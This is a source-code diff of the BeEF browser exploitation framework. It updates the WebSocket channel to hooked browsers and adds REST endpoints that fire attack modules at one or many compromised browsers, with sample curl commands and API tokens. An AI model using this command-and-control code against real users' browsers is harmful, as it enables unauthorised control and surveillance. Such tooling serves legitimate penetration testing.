+          #              #print_debug("Received from WebSocket #{messageHash}")
+          #              execute(msg_hash)
+          #            end
+          #          }
+          #        rescue Exception => e
+          #          print_error "WebSocket-secured error: #{e}"
+          #        end
+          #      end
+          #    }
+          #
+          #  }
+          #
+          ##Thread for websocket
+          #Thread.new {
+          #  port = @@config.get("beef.http.websocket.port")
+          #  sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
+          #  EventMachine.run {
+          #
+          #    wsopt = {:host => "0.0.0.0", :port => port}
+          #
+          #
+          #    EventMachine::WebSocket.start(wsopt) do |ws|
+          #      begin
+          #        print_debug "New WebSocket channel open."
+          #        ws.onmessage { |msg|
+          #          msg_hash = JSON.parse("#{msg}")
+          #          #@note messageHash[result] is Base64 encoded
+          #          if (msg_hash["cookie"]!= nil)
+          #            print_debug("WebSocket - Browser says helo! WebSocket is running")
+          #            #insert new connection in activesocket
+          #            @@activeSocket["#{msg_hash["cookie"]}"] = ws
+          #            print_debug("WebSocket - activeSocket content [#{@@activeSocket}]")
+          #          elsif msg_hash["alive"] != nil
+          #            hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
+          #            unless hooked_browser.nil?
+          #              hooked_browser.lastseen = Time.new.to_i
+          #              hooked_browser.count!
+          #              hooked_browser.save
+          #
+          #              #Check if new modules need to be sent
+          #              zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
+          #              zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
+          #
+          #              #@todo antisnatchor:
+          #              #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
+          #              #Check if new forged requests need to be sent (Requester/TunnelingProxy)
+          #              dhook = BeEF::Extension::Requester::API::Hook.new
+          #              dhook.requester_run(hooked_browser, '')
+          #
+          #              #Check if new XssRays scan need to be started
+          #              xssrays = BeEF::Extension::Xssrays::API::Scan.new
+          #              xssrays.start_scan(hooked_browser, '')
+          #            end
+          #          else
+          #            #json recv is a cmd response decode and send all to
+          #            #we have to call dynamicreconstructor handler camp must be websocket
+          #            #print_debug("Received from WebSocket #{messageHash}")
+          #            execute(msg_hash)
+          #          end
+          #        }
+          #      rescue Exception => e
+          #        print_error "WebSocket error: #{e}"
+          #      end
+          #    end
+          #  }
+          #}
+
+
+        end
+
+        def start_websocket_server(ws_options, secure)
           Thread.new {
             sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
-            EventMachine.run { #todo antisnatchor: add support for WebSocket secure (new object with different config options, then start)
-              EventMachine::WebSocket.start(:host => "0.0.0.0", :port => port) do |ws|
+            EventMachine.run {
+              EventMachine::WebSocket.start(ws_options) do |ws|
                 begin
-                  print_debug "New WebSocket channel open."
+                  secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.")
                   ws.onmessage { |msg|
                     msg_hash = JSON.parse("#{msg}")
                     #@note messageHash[result] is Base64 encoded
@@ -80,7 +209,6 @@ module BeEF
               end
             }
           }
-
         end
 
         #@note retrieve the right websocket channel given an hooked browser session
@@ -115,7 +243,7 @@ module BeEF
           handler = data["handler"]
           if handler.match(/command/)
             BeEF::Core::Models::Command.save_result(hooked_browser, data["cid"],
-                 @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
+                                                    @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
           else #processing results from extensions, call the right handler
             data["beefhook"] = hooked_browser
             data["results"] = JSON.parse(Base64.decode64(data["result"]))

core/main/rest/api.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
@@ -29,6 +19,12 @@ module BeEF
         end
       end
 
+      module RegisterCategoriesHandler
+        def self.mount_handler(server)
+          server.mount('/api/categories', BeEF::Core::Rest::Categories.new)
+        end
+      end
+
       module RegisterLogsHandler
         def self.mount_handler(server)
           server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
@@ -43,6 +39,8 @@ module BeEF
 
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
+
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
 

core/main/rest/handlers/admin.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/rest/handlers/categories.rb

@@ -0,0 +1,39 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Categories < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        get '/' do
+           categories = BeEF::Modules::get_categories
+           cats = Array.new
+           i = 0
+           # todo add sub-categories support!
+           categories.each do |category|
+             cat = {"id" => i, "name" => category}
+             cats << cat
+             i += 1
+           end
+           cats.to_json
+        end
+
+      end
+    end
+  end
+end

core/main/rest/handlers/hookedbrowsers.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
@@ -30,12 +20,16 @@ module BeEF
                   'Expires' => '0'
         end
 
+        #
         # @note Return a can of Leffe to the thirsty Bovine Security Team member. AthCon2012 joke /antisnatchor/
+        #
         #get "/to/a/pub"
         #  "BeER please"
         #end
 
+        #
         # @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
+        #
         get '/' do
           online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
           offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
@@ -49,7 +43,9 @@ module BeEF
           output.to_json
         end
 
+        #
         # @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
+        #
         get '/:session' do
           hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
           error 401 unless hb != nil
@@ -76,11 +72,12 @@ module BeEF
            details = BeEF::Core::Models::BrowserDetails
 
            {
+               'id' => hb.id,
+               'session' => hb.session,
                'name' => details.get(hb.session, 'BrowserName'),
                'version' => details.get(hb.session, 'BrowserVersion'),
                'os' => details.get(hb.session, 'OsName'),
                'platform' => details.get(hb.session, 'SystemPlatform'),
-               'session' => hb.session,
                'ip' => hb.ip,
                'domain' => details.get(hb.session, 'HostName'),
                'port' => hb.port.to_s,

core/main/rest/handlers/logs.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
@@ -30,13 +20,17 @@ module BeEF
                   'Expires' => '0'
         end
 
+        #
         # @note Get all global logs
+        #
         get '/' do
           logs = BeEF::Core::Models::Log.all()
           logs_to_json(logs)
         end
 
+        #
         # @note Get hooked browser logs
+        #
         get '/:session' do
           hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
           error 401 unless hb != nil

core/main/rest/handlers/modules.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
@@ -30,7 +20,9 @@ module BeEF
                   'Expires' => '0'
         end
 
+        #
         # @note Get all available and enabled modules (id, name, category)
+        #
         get '/' do
           mods = BeEF::Core::Models::CommandModule.all
 
@@ -50,7 +42,18 @@ module BeEF
           mods_hash.to_json
         end
 
+        get '/search/:mod_name' do
+          mod = BeEF::Core::Models::CommandModule.first(:name => params[:mod_name])
+          result = {}
+          if mod != nil
+            result = {'id' => mod.id}
+          end
+          result.to_json
+        end
+
+        #
         # @note Get the module definition (info, options)
+        #
         get '/:mod_id' do
           cmd = BeEF::Core::Models::CommandModule.get(params[:mod_id])
           error 404 unless cmd != nil
@@ -76,20 +79,29 @@ module BeEF
         #Content-Type: application/json; charset=UTF-8
         #
         #{"date":"1331637093","data":"{\"data\":\"text=michele\"}"}
+        #
         get '/:session/:mod_id/:cmd_id' do
           hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
           error 401 unless hb != nil
           cmd = BeEF::Core::Models::Command.first(:hooked_browser_id => hb.id,
                                                   :command_module_id => params[:mod_id], :id => params[:cmd_id])
           error 404 unless cmd != nil
-          result = BeEF::Core::Models::Result.first(:hooked_browser_id => hb.id, :command_id => cmd.id)
-          error 404 unless result != nil
-          {
-             'date' => result.date,
-             'data' => result.data
-          }.to_json
+          results = BeEF::Core::Models::Result.all(:hooked_browser_id => hb.id, :command_id => cmd.id)
+          error 404 unless results != nil
+
+          results_hash = {}
+          i = 0
+          results.each do |result|
+            results_hash[i] = {
+                'date' => result.date,
+                'data' => result.data
+            }
+            i+=1
+          end
+          results_hash.to_json
         end
 
+        #
         # @note Fire a new command module to the specified hooked browser.
         # Return the command_id of the executed module if it has been fired correctly.
         # Input must be specified in JSON format
@@ -123,6 +135,7 @@ module BeEF
         #Content-Length: 35
         #
         #{"success":"true","command_id":"not_available"}
+        #
         post '/:session/:mod_id' do
           hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
           error 401 unless hb != nil
@@ -141,6 +154,122 @@ module BeEF
             error 400 # Bad Request
           end
         end
+
+        #
+        #@note Fire a new command module to multiple hooked browsers.
+        # Returns the command IDs of the launched module, or 0 if firing got issues.
+        #
+        # POST request body example (for modules that don't need parameters, just remove "mod_params")
+        #  {
+        #    "mod_id":1,
+        #    "mod_params":{
+        #       "question":"are you hooked?"
+        #     },
+        #    "hb_ids":[1,2]
+        #   }
+        #
+        # response example: {"1":16,"2":17}
+        #
+        # curl example (alert module with custom text, 2 hooked browsers)):
+        #
+        #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}'
+        #-X POST http://127.0.0.1:3000/api/modules/multi?token=2316d82702b83a293e2d46a0886a003a6be0a633
+        #
+        post '/multi_browser' do
+          request.body.rewind
+          begin
+            body = JSON.parse request.body.read
+
+            modk = BeEF::Module.get_key_by_database_id body["mod_id"]
+            error 404 unless modk != nil
+            mod_params = []
+
+            if body["mod_params"] != nil
+              body["mod_params"].each{|k,v|
+                mod_params.push({'name' => k, 'value' => v})
+              }
+            end
+
+            hb_ids = body["hb_ids"]
+            results = Hash.new
+            hb_ids.each do |hb_id|
+              hb = BeEF::Core::Models::HookedBrowser.first(:id => hb_id)
+              if hb == nil
+                results[hb_id] = 0
+                next
+              else
+                cmd_id = BeEF::Module.execute(modk, hb.session, mod_params)
+                results[hb_id] = cmd_id
+              end
+            end
+            results.to_json
+          rescue Exception => e
+            print_error "Invalid JSON input passed to endpoint /api/modules/multi"
+            error 400 # Bad Request
+          end
+        end
+
+        # @note Fire multiple command modules to a single hooked browser.
+        # Returns the command IDs of the launched modules, or 0 if firing got issues.
+        #
+        # POST request body example (for modules that don't need parameters, just pass an empty JSON object like {} )
+        #{ "hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
+        #    "modules": [
+        #        {    # test_return_long_string module with custom input
+        #             "mod_id":99,
+        #              "mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]
+        #        },
+        #        {   # prompt_dialog module with custom input
+        #            "mod_id":116,
+        #            "mod_input":[{"question":"hooked?"}]
+        #        },
+        #        {   # alert_dialog module without input (using default input, if any)
+        #            "mod_id":128,
+        #            "mod_input":[]
+        #        }
+        #    ]
+        #  }
+        # response example: {"99":7,"116":8,"128":0} # <- This means the alert_dialog had issues (see return value 0)
+        #
+        # curl example (test_return_long_string and prompt_dialog module with custom inputs)):
+        #
+        #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
+        # "modules":[{"mod_id":99,"mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]},{"mod_id":116,"mod_input":[{"question":"hooked?"}]},{"mod_id":128,"mod_input":[]}]}'
+        #  -X POST http://127.0.0.1:3000/api/modules/multi_module?token=e640483ae9bca2eb904f003f27dd4bc83936eb92
+        #
+        post '/multi_module' do
+          request.body.rewind
+          begin
+            body = JSON.parse request.body.read
+            hb = BeEF::Core::Models::HookedBrowser.first(:session => body["hb"])
+            error 401 unless hb != nil
+
+            results = Hash.new
+            if body["modules"] != nil
+              body["modules"].each{|mod|
+                mod_id = mod["mod_id"]
+                mod_k = BeEF::Module.get_key_by_database_id mod["mod_id"]
+                if mod_k == nil
+                  results[mod_id] = 0
+                  next
+                else
+                  mod_params = []
+                  mod["mod_input"].each{|input|
+                    input.each{|k,v|
+                      mod_params.push({'name' => k, 'value' => v})
+                    }
+                  }
+                  cmd_id = BeEF::Module.execute(mod_k, hb.session, mod_params)
+                  results[mod_id] = cmd_id
+                end
+              }
+            end
+            results.to_json
+          rescue Exception => e
+            print_error "Invalid JSON input passed to endpoint /api/modules/multi"
+            error 400 # Bad Request
+          end
+        end
       end
     end
   end

core/main/router/api.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core

core/main/router/router.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF